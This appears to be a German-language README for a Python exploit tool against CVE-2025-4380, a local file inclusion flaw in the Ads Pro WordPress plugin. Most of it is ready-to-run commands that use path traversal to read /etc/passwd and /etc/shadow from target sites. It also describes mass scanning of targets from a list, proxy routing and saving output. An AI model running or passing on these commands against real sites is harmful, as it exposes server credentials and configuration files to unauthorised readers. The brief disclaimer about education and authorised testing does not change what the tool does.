
Python-Exploit für CVE-2025-4380, eine Local-File-Inclusion-Schwachstelle im Ads Pro WordPress-Plugin. Unterstützt Einzel- und Massenziel-Scanning mit Proxy-Unterstützung.
Dieser Python-Exploit zielt auf Ads Pro Plugin ≤ 4.89 für WordPress ab, das anfällig für Local File Inclusion (LFI) über die AJAX-Aktion bsa_preview_callback ist.
Ein nicht authentifizierter Angreifer kann dies ausnutzen, um beliebige Dateien aus dem Server-Dateisystem zu lesen, einschließlich sensibler Dateien wie /etc/passwd, wp-config.php und weiterer.
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080
| Argument | Beschreibung | Erforderlich |
|---|---|---|
-u, --url | Ziel-URL (z. B. http://target.com) | Optional |
-l, --list | Datei mit Liste der Ziel-URLs | Optional |
-p, --path | Einzuschließender Dateipfad (z. B. ../../etc/passwd) | Ja |
-o, --output | Ausgabedatei zum Speichern der Ergebnisse | Optional |
--proxy | Proxy (z. B. http://127.0.0.1:8080) | Optional |

Burpsuite Anforderung/Antwort


CVE-2025-4380
Ads Pro Plugin <= 4.89 - Local File Inclusion via bsa_template in bsa_preview_callback
Dieser Exploit wird nur zu Bildungszwecken und für autorisierte Sicherheitstests bereitgestellt.